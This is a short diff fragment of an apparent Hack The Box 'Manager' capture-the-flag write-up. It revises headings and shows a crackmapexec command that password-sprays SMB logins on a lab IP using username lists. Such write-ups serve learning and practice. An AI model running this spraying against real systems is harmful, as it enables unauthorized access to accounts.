antonytuff/antonytuff.github.io/content/posts/HTB_Manager.md

 - no-pass: Indicates no password is provided.
 ```
 ![](/img/Pasted%20image%2020250105205121.png)
-What we can do
+What now have a valid list of valid domain usernames the next steps is password spraying.

-Password Spraying
+#### Password Spraying
 ```
 crackmapexec smb 10.10.11.236 -u domainusers.txt -p lowercase_users.txt --no-brute --continue-on-success